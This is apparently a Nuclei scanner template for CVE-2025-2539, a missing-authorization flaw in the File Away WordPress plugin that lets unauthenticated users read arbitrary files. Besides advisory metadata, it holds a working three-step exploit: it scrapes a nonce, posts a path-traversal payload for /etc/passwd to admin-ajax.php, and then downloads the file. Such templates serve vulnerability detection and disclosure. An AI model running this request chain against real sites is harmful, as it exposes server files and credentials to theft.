id: CVE-2025-2539

info:
  name: File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The File Away plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers, leveraging the use of a reversible weak algorithm,  to read the contents of arbitrary files on the server, which can contain sensitive information.
  impact: |
    Unauthenticated attackers can exploit weak encryption and missing authorization to read arbitrary files from the server, potentially exposing sensitive documents, configuration files, and user data.
  remediation: |
    Upgrade to File Away version 3.9.9.1 or later that implements proper capability checks and stronger encryption.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-away/file-away-39901-missing-authorization-to-unauthenticated-arbitrary-file-read
    - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_encrypted.php
    - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_stats.php
    - https://wordpress.org/plugins/file-away/#developers
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b23bd5c-db27-4d63-8461-1f36958a2ff6?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-2539
    cwe-id: CWE-327
    epss-score: 0.20718
    epss-percentile: 0.95745
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/file-away/"
  tags: cve,cve2025,lfi,file-away,wordpress,wp-plugin,wp,vkev,vuln

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'fileaway_stats.*admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=fileaway-stats&nonce={{nonce}}&file=/../../../../../../../../etc/passwd

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - fileaway_download

    extractors:
      - type: regex
        part: body
        internal: true
        name: download_url
        group: 1
        regex:
          - '".*(\?.*?)"'

  - raw:
      - |
        GET /{{download_url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: content_type
        words:
          - "application/force-download"
# digest: 4b0a00483046022100f460fc7edeac00c3743a5a56177c3d085079c0eaebc446c63e0995c7f8627afa022100f55c82281c03b3ccbbb54782e1758298606f49c5d860ad6898e2382d4a43e9b7:922c64590222798bb761d5b6d8e72950